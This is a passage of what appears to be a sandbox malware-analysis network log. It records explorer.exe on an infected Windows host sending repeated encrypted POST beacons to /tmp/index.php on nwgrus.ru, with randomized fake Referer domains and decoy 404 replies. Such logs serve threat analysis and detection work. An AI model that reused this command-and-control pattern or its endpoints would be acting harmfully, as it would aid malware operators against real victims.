Oct 3, 2024 02:52:41.272486925 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 3, 2024 02:52:41.272905111 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 3, 2024 02:52:41.273628950 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:41.280611038 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ywnrujdiubrl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: nwgrus.ru
Oct 3, 2024 02:52:41.280636072 CEST	133	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 25 40 af 96 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu%@=WHufYSep(5JpVj
Oct 3, 2024 02:52:42.376409054 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:42 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:42.392420053 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://llaskwsfjjpffj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 141 Host: nwgrus.ru
Oct 3, 2024 02:52:42.392446995 CEST	141	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5c 3f e5 bc Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu\?\rCZcIX)'1OI*)^5I$lm
Oct 3, 2024 02:52:43.552974939 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:43.567970991 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nrxoolvtsikko.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 296 Host: nwgrus.ru
Oct 3, 2024 02:52:43.568006992 CEST	296	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 2b 2b a5 f1 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu++U#Cq26rImjlU0Plq)4P/VYv`O?J(}5s'y^^7T=+l!4vDOUne&"X-
Oct 3, 2024 02:52:44.660093069 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:44 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:44.676074028 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sjiiqjlirvpxdxa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: nwgrus.ru
Oct 3, 2024 02:52:44.676100016 CEST	183	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 57 33 e5 99 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuW3L Slu>Zy(4=prU.E$[N@OYIsi#.04_oKPt
Oct 3, 2024 02:52:45.770915985 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:45.786030054 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vhprqvsefqk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: nwgrus.ru
Oct 3, 2024 02:52:45.786030054 CEST	314	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 61 34 b7 af Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vua4Jd\|YZeV99k<,vwp"^LV<Z@LV@VR4}BWIct07)'Bjy~[B\E\|#
Oct 3, 2024 02:52:46.899544954 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:46.922025919 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vtfvgsblgpnxu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: nwgrus.ru
Oct 3, 2024 02:52:46.922041893 CEST	150	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 21 30 e6 be Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu!0loDxQZONTBmx[R2Z%FdEv
Oct 3, 2024 02:52:48.006617069 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:47 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:48.021768093 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uxyakrfxevg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 340 Host: nwgrus.ru
Oct 3, 2024 02:52:48.021769047 CEST	340	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 42 54 d3 e7 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuBTN;nTPc6Q7d`jLfJH'*_{}ZVUZ\+_.;Sblsw==?J/HOsZ8C9"]F&
Oct 3, 2024 02:52:49.125507116 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:49.139525890 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tltlkajmdifu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: nwgrus.ru
Oct 3, 2024 02:52:49.139568090 CEST	258	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 54 25 a0 a0 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuT%0Vb}8kFQpPnY?=~-*95Z<7u-Y+H]}X[7w.lCc@5ZM>7V/\;Ni
Oct 3, 2024 02:52:50.225066900 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:50.232947111 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nsllnqutblayn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: nwgrus.ru
Oct 3, 2024 02:52:50.232956886 CEST	112	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 5e 24 a6 ea Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu^$s-lP'xI>$X
Oct 3, 2024 02:52:51.414446115 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 